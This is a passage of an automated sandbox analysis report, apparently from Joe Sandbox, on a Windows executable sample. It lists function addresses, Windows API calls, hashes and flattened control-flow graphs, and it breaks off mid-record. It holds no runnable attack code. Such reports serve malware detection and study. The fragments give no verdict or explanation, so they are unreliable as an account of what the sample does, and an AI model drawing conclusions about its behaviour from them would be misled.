7ff6e17d1ffd EnterCriticalSection LeaveCriticalSection 4125->4127 4127->4126 4128 7ff6e17d2050 4129 7ff6e17d205e EnterCriticalSection 4128->4129 4130 7ff6e17d20cf 4128->4130 4131 7ff6e17d20c2 LeaveCriticalSection 4129->4131 4132 7ff6e17d2079 4129->4132 4131->4130 4132->4131 4133 7ff6e17d20bd free 4132->4133 4133->4131 4156 7ff6e17d1a70 4157 7ff6e17d199e 4156->4157 4161 7ff6e17d1a7d 4156->4161 4158 7ff6e17d1a0f 4157->4158 4159 7ff6e17d19e9 VirtualProtect 4157->4159 4159->4157 4160 7ff6e17d1b5c 4161->4156 4161->4160 4162 7ff6e17d1b36 4161->4162 4163 7ff6e17d1ba0 4 API calls 4162->4163 4164 7ff6e17d1b53 4163->4164 4185 7ff6e17d1e10 4186 7ff6e17d1e2f 4185->4186 4187 7ff6e17d1ecc 4186->4187 4189 7ff6e17d1eb5 4186->4189 4192 7ff6e17d1e55 4186->4192 4188 7ff6e17d1ed3 signal 4187->4188 4187->4189 4188->4189 4190 7ff6e17d1ee4 4188->4190 4190->4189 4191 7ff6e17d1eea signal 4190->4191 4191->4189 4192->4189 4193 7ff6e17d1f12 signal 4192->4193 4193->4189 4134 7ff6e17d1f47 4135 7ff6e17d1e67 signal 4134->4135 4138 7ff6e17d1e99 4134->4138 4136 7ff6e17d1e7c 4135->4136 4135->4138 4137 7ff6e17d1e82 signal 4136->4137 4136->4138 4137->4138

                                                                  Executed Functions

                                                                  Function 00007FF6E17D1160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
                                                                  • Instruction ID: 8721468547df2c7e35ec2c08cf007f65924c3086fc33d8843986c66394aeb3c9
                                                                  • Opcode Fuzzy Hash: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
                                                                  • Instruction Fuzzy Hash: 61514233A1D64A81FF109B55E95137927A1BF96F90F044032C94DC73A3DE3FA4A5AB0A
                                                                  Function 00007FF6E17D1394 Relevance: 1.5, APIs: 1, Instructions: 24nativethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtOpenThreadTokenEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E17D1156), ref: 00007FF6E17D13F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: OpenThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3674800776-0
                                                                  • Opcode ID: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
                                                                  • Instruction ID: 53270731c6d2b93ad874f7acd510b236f6e0d8e98c196d79274192b56cdded90
                                                                  • Opcode Fuzzy Hash: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
                                                                  • Instruction Fuzzy Hash: 02F0FF7390CB4982DB14CB51F85022A7B60FB8BB80F009439E99C93726DF3DE0609F49

                                                                  Non-executed Functions

                                                                  Function 00007FF6E17D3B50 Relevance: 123.0, APIs: 67, Strings: 2, Instructions: 2201COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                                  • String ID: $Cj$
                                                                  • API String ID: 3604702941-2283968559
                                                                  • Opcode ID: 977a8b60ba0579ddc254c121587a38851822c67f71bdae5852861dd88830eb9e
                                                                  • Instruction ID: 34c3b76d185647ec9ecd6cb9e9f361323ebf4ce6952f5fec0f88e217d63c9e73
                                                                  • Opcode Fuzzy Hash: 977a8b60ba0579ddc254c121587a38851822c67f71bdae5852861dd88830eb9e
                                                                  • Instruction Fuzzy Hash: FE53B363D2C6C684FB218B2DE8013F42360BF96744F445236D98ED55A2EF6E6294E70F
                                                                  Function 00007FF6E17D2690 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 322COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                  • String ID: 0$Cj$$X$`
                                                                  • API String ID: 329590056-3100607097
                                                                  • Opcode ID: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
                                                                  • Instruction ID: 6756c7d70eb6b1da3eab7d99ecf47820deeb9eabba0ad61c0368d87a5103d665
                                                                  • Opcode Fuzzy Hash: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
                                                                  • Instruction Fuzzy Hash: 6F028F23A1CBC581E7208B19F8043AA77A0FB85B94F404236DA9C837E6DF3DD199DB05
                                                                  Function 00007FF6E17D3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscatwcscpywcslen
                                                                  • String ID: $0$0$@$@
                                                                  • API String ID: 4263182637-1413854666
                                                                  • Opcode ID: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
                                                                  • Instruction ID: 10a1c99994dff963448b00d6b7b0f3b52168f8a8bff714ef2c0b099c7b5c27ed
                                                                  • Opcode Fuzzy Hash: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
                                                                  • Instruction Fuzzy Hash: 25B1F263A1C6C585F7218B29F4053BB77A0FF81744F400235EA8D82696DF7ED199EB0A
                                                                  Function 00007FF6E17D1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF6E17DA4DC,00007FF6E17DA4DC,?,?,00007FF6E17D0000,?,00007FF6E17D1991), ref: 00007FF6E17D1C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF6E17DA4DC,00007FF6E17DA4DC,?,?,00007FF6E17D0000,?,00007FF6E17D1991), ref: 00007FF6E17D1CC7
                                                                  • memcpy.MSVCRT ref: 00007FF6E17D1CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF6E17DA4DC,00007FF6E17DA4DC,?,?,00007FF6E17D0000,?,00007FF6E17D1991), ref: 00007FF6E17D1D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction ID: 5e09ccdaefcf6fcd6f789a6a08f96452b9cd440191071d6e31d9eddd691f3465
                                                                  • Opcode Fuzzy Hash: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction Fuzzy Hash: 65418363A0864A81EF119B46E4447B827A0FB46F80F554132DD0EC7792DE3EE595EB0A
                                                                  Function 00007FF6E17D2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction ID: 9d3ee39dcaf6dd9e1368e7eb7fcff84f0f93d848d9de8c732f5a714fa5b560e2
                                                                  • Opcode Fuzzy Hash: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction Fuzzy Hash: 7B21F322B0D54A81EB169B16E9003382261BF12F91F464431DD5DD76A1DF7FF8A3AA0A
                                                                  Function 00007FF6E17D8320 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 185COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 640 7ff6e17d8320-7ff6e17d833c 641 7ff6e17d833e 640->641 642 7ff6e17d836b-7ff6e17d838f call 7ff6e17d8310 640->642 643 7ff6e17d8345-7ff6e17d834a 641->643 647 7ff6e17d85b6-7ff6e17d85c8 642->647 649 7ff6e17d8395-7ff6e17d83a9 call 7ff6e17d8310 642->649 645 7ff6e17d8350-7ff6e17d8353 643->645 645->647 648 7ff6e17d8359-7ff6e17d835f 645->648 648->645 650 7ff6e17d8361-7ff6e17d8366 648->650 653 7ff6e17d83bf-7ff6e17d83d1 649->653 650->647 654 7ff6e17d83b3-7ff6e17d83bd 653->654 655 7ff6e17d83d3-7ff6e17d83ed call 7ff6e17d8310 653->655 654->653 656 7ff6e17d8415-7ff6e17d8418 654->656 660 7ff6e17d83ef-7ff6e17d8411 call 7ff6e17d8310 * 2 655->660 661 7ff6e17d83b0 655->661 656->647 659 7ff6e17d841e-7ff6e17d844a call 7ff6e17d8310 malloc 656->659 666 7ff6e17d8450-7ff6e17d8452 659->666 667 7ff6e17d85ac 659->667 660->654 673 7ff6e17d8413 660->673 661->654 666->667 668 7ff6e17d8458-7ff6e17d8488 call 7ff6e17d8310 * 2 666->668 667->647 676 7ff6e17d8490-7ff6e17d84a7 668->676 673->659 677 7ff6e17d8583-7ff6e17d858b 676->677 678 7ff6e17d84ad-7ff6e17d84b3 676->678 681 7ff6e17d858d-7ff6e17d8590 677->681 682 7ff6e17d8596-7ff6e17d85a4 677->682 679 7ff6e17d8502 678->679 680 7ff6e17d84b5-7ff6e17d84d3 call 7ff6e17d8310 678->680 685 7ff6e17d8507-7ff6e17d8549 call 7ff6e17d8310 * 2 679->685 688 7ff6e17d84e0-7ff6e17d84fe 680->688 681->676 681->682 682->643 684 7ff6e17d85aa 682->684 684->647 693 7ff6e17d854b 685->693 694 7ff6e17d8578-7ff6e17d857f 685->694 688->688 691 7ff6e17d8500 688->691 691->685 695 7ff6e17d8550-7ff6e17d855c 693->695 694->677 696 7ff6e17d8573 695->696 697 7ff6e17d855e-7ff6e17d8571 695->697 696->694 697->695 697->696
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID: =$$Cj$$i$$i$
                                                                  • API String ID: 2803490479-1879266049
                                                                  • Opcode ID: a12c45f0e63f0545611badf4b31fa90aab6001f018c5534414d701305adcf2b0
                                                                  • Instruction ID: aa78e7512a7f4e9a00d577885a254906b93d910ef9d199e15836b4dd9239c090
                                                                  • Opcode Fuzzy Hash: a12c45f0e63f0545611badf4b31fa90aab6001f018c5534414d701305adcf2b0
                                                                  • Instruction Fuzzy Hash: B371E233B086194BDB549F15945073E36A1FB89F48F044134DE4ED3396DE3AE8A0AB4A
                                                                  Function 00007FF6E17D1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 730 7ff6e17d1e10-7ff6e17d1e2d 731 7ff6e17d1e3e-7ff6e17d1e48 730->731 732 7ff6e17d1e2f-7ff6e17d1e38 730->732 734 7ff6e17d1ea3-7ff6e17d1ea8 731->734 735 7ff6e17d1e4a-7ff6e17d1e53 731->735 732->731 733 7ff6e17d1f60-7ff6e17d1f69 732->733 734->733 738 7ff6e17d1eae-7ff6e17d1eb3 734->738 736 7ff6e17d1e55-7ff6e17d1e60 735->736 737 7ff6e17d1ecc-7ff6e17d1ed1 735->737 736->734 741 7ff6e17d1f23-7ff6e17d1f2d 737->741 742 7ff6e17d1ed3-7ff6e17d1ee2 signal 737->742 739 7ff6e17d1eb5-7ff6e17d1eba 738->739 740 7ff6e17d1efb-7ff6e17d1f0a call 7ff6e17d88c0 738->740 739->733 746 7ff6e17d1ec0 739->746 740->741 751 7ff6e17d1f0c-7ff6e17d1f10 740->751 744 7ff6e17d1f43-7ff6e17d1f45 741->744 745 7ff6e17d1f2f-7ff6e17d1f3f 741->745 742->741 747 7ff6e17d1ee4-7ff6e17d1ee8 742->747 744->733 745->744 746->741 749 7ff6e17d1f4e-7ff6e17d1f53 747->749 750 7ff6e17d1eea-7ff6e17d1ef9 signal 747->750 752 7ff6e17d1f5a 749->752 750->733 753 7ff6e17d1f12-7ff6e17d1f21 signal 751->753 754 7ff6e17d1f55 751->754 752->733 753->733 754->752
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: dcece1a9a345dc98801b2edf6f2fa389c4cd27cf161fb8fe92b3b520b557ff1a
                                                                  • Instruction ID: 76fabd6da03f9bf453f15efd98b1bd89553ea0b185e05fea173d106a7a80d379
                                                                  • Opcode Fuzzy Hash: dcece1a9a345dc98801b2edf6f2fa389c4cd27cf161fb8fe92b3b520b557ff1a
                                                                  • Instruction Fuzzy Hash: 8D21E523F0E10E41FF74425495403791191DF9BFA4F248171DA0DC73D6CE2EA8E1AA4B
                                                                  Function 00007FF6E17D1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 755 7ff6e17d1880-7ff6e17d189c 756 7ff6e17d18a2-7ff6e17d18f9 call 7ff6e17d2420 call 7ff6e17d2660 755->756 757 7ff6e17d1a0f-7ff6e17d1a1f 755->757 756->757 762 7ff6e17d18ff-7ff6e17d1910 756->762 763 7ff6e17d1912-7ff6e17d191c 762->763 764 7ff6e17d193e-7ff6e17d1941 762->764 765 7ff6e17d191e-7ff6e17d1929 763->765 766 7ff6e17d194d-7ff6e17d1954 763->766 764->766 767 7ff6e17d1943-7ff6e17d1947 764->767 765->766 768 7ff6e17d192b-7ff6e17d193a 765->768 770 7ff6e17d199e-7ff6e17d19a6 766->770 771 7ff6e17d1956-7ff6e17d1961 766->771 767->766 769 7ff6e17d1a20-7ff6e17d1a26 767->769 768->764 772 7ff6e17d1a2c-7ff6e17d1a37 769->772 773 7ff6e17d1b87-7ff6e17d1b98 call 7ff6e17d1d40 769->773 770->757 775 7ff6e17d19a8-7ff6e17d19c1 770->775 774 7ff6e17d1970-7ff6e17d199c call 7ff6e17d1ba0 771->774 772->770 777 7ff6e17d1a3d-7ff6e17d1a5f 772->777 774->770 776 7ff6e17d19df-7ff6e17d19e7 775->776 780 7ff6e17d19d0-7ff6e17d19dd 776->780 781 7ff6e17d19e9-7ff6e17d1a0d VirtualProtect 776->781 782 7ff6e17d1a7d-7ff6e17d1a97 777->782 780->757 780->776 781->780 785 7ff6e17d1b74-7ff6e17d1b82 call 7ff6e17d1d40 782->785 786 7ff6e17d1a9d-7ff6e17d1afa 782->786 785->773 792 7ff6e17d1b22-7ff6e17d1b26 786->792 793 7ff6e17d1afc-7ff6e17d1b0e 786->793 796 7ff6e17d1a70-7ff6e17d1a77 792->796 797 7ff6e17d1b2c-7ff6e17d1b30 792->797 794 7ff6e17d1b10-7ff6e17d1b20 793->794 795 7ff6e17d1b5c-7ff6e17d1b6c 793->795 794->792 794->795 795->785 799 7ff6e17d1b6f call 7ff6e17d1d40 795->799 796->770 796->782 797->796 798 7ff6e17d1b36-7ff6e17d1b53 call 7ff6e17d1ba0 797->798 802 7ff6e17d1b57 798->802 799->785 802->802
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E17D1247), ref: 00007FF6E17D19F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: 287094a85b2253c4f613aac48dc49c5c0556f702c10d22a5b68489503c3bbe79
                                                                  • Instruction ID: 9e2fb8cf2eebefac078949754b7f2b9fdb57669e385df6e9a58b5adff18fccb8
                                                                  • Opcode Fuzzy Hash: 287094a85b2253c4f613aac48dc49c5c0556f702c10d22a5b68489503c3bbe79
                                                                  • Instruction Fuzzy Hash: 48518433F0854AC6EF109B25E8417B43761AB06F98F044131D91D87796CF3EE9A1EB0A
                                                                  Function 00007FF6E17D1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 803 7ff6e17d1800-7ff6e17d1810 804 7ff6e17d1812-7ff6e17d1822 803->804 805 7ff6e17d1824 803->805 806 7ff6e17d182b-7ff6e17d1867 call 7ff6e17d2290 fprintf 804->806 805->806
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmpDownload File
